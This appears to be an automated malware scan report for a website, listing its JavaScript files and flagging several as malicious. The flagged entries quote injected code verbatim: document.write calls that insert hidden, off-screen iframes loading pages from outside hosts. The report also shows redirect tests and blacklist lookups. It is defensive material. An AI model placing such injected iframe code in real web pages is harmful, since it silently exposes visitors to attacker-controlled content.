Scanned pages/files
Request | Server response | Status |
http://wweebb.ru/ | 200 OK Content-Length: 33112 Content-Type: text/html | clean |
http://wweebb.ru/media/system/js/caption.js | 200 OK Content-Length: 359 Content-Type: text/javascript | clean |
http://wweebb.ru/modules/mod_news_pro_gk1/scripts/engine_standard_compressed.js | 200 OK Content-Length: 199 Content-Type: text/javascript | clean |
http://wweebb.ru/modules/mod_yoo_carousel/mod_yoo_carousel.js | 200 OK Content-Length: 201 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ');;document.write('<iframe src="http://spmixko.mrslove.com/a67e14182644d684f74805.NqxvMmR6Lzrn?default" name="Franklera" height="90" width="90" style="left:-500px;top:0px;position:fixed;"></iframe>'); Antivirus reports:
| ||
http://wweebb.ru/plugins/system/yoo_effects/yoo_effects.js3b07.js?lb=1&re=1&sl=1 | 200 OK Content-Length: 690 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) );></iframe>');</iframe>');;document.write('<iframe src="http://spmixko.mrslove.com/a67e14182644d684f74805.NqxvMmR6Lzrn?default" name="Franklera" height="90" width="90" style="left:-500px;top:0px;position:fixed;"></iframe>');;>');e>');;document.write('<iframe src="http://spmixko.mrslove.com/a67e14182644d684f74805.NqxvMmR6Lzrn?default" name="Franklera" height="90" width="90" style="left:-500px;top:0px;position:fixed;"></iframe>');;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;>');></iframe>');;document.write('<iframe src="http://spmixko.mrslove.com/a67e14182644d684f74805.NqxvMmR6Lzrn?default" name="Franklera" height="90" width="90" style="left:-500px;top:0px;position:fixed;"></iframe>'); Antivirus reports:
| ||
http://wweebb.ru/templates/ja_utahia_ii/scripts/ja.script.js | 200 OK Content-Length: 327 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) 2a28b.NH2aVeSKNPTLdv?default" name="Olerace" height="105" width="105" style="left:-500px;top:0px;position:fixed;"></iframe>');');;document.write('<iframe src="http: Antivirus reports:
| ||
http://www.wweebb.ru/templates/ja_utahia_ii/scripts/opacity.js | 404 Not Found Content-Length: 3621 Content-Type: text/html | clean |
http://www.wweebb.ru/hosting_static_404/modernizr.js | 200 OK Content-Length: 6296 Content-Type: text/javascript | clean |
http://www.wweebb.ru/hosting_static_404/script.js | 200 OK Content-Length: 96238 Content-Type: text/javascript | clean |
http://www.wweebb.ru/test404page.js | 404 Not Found Content-Length: 3621 Content-Type: text/html | clean |
http://wweebb.ru/templates/ja_utahia_ii/ja_iconmenu/ja.iconmenu.js | 200 OK Content-Length: 400 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe src="http://txwhbn.rebatesrule.net/fae4320a1806bc33e.DX8qWng7TfQ8OO?default" name="Olerace" height="105" width="105" style="left:-500px;top:0px;position:fixed;"></iframe>');e>');;document.write('<iframe src="http://spmixko.mrslove.com/a67e14182644d684f74805.NqxvMmR6Lzrn?default" name="Franklera" height="90" width="90" style="left:-500px;top:0px;position:fixed;"></iframe>'); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wweebb.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 17:21:27 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: wweebb.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 17:21:27 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: wweebb.ru
Referer: http://www.google.com/search?q=wweebb.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wweebb.ru
Referer: http://www.google.com/search?q=wweebb.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wweebb.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wweebb.ru/
Result: wweebb.ru is not infected or malware details are not published yet.
Result: wweebb.ru is not infected or malware details are not published yet.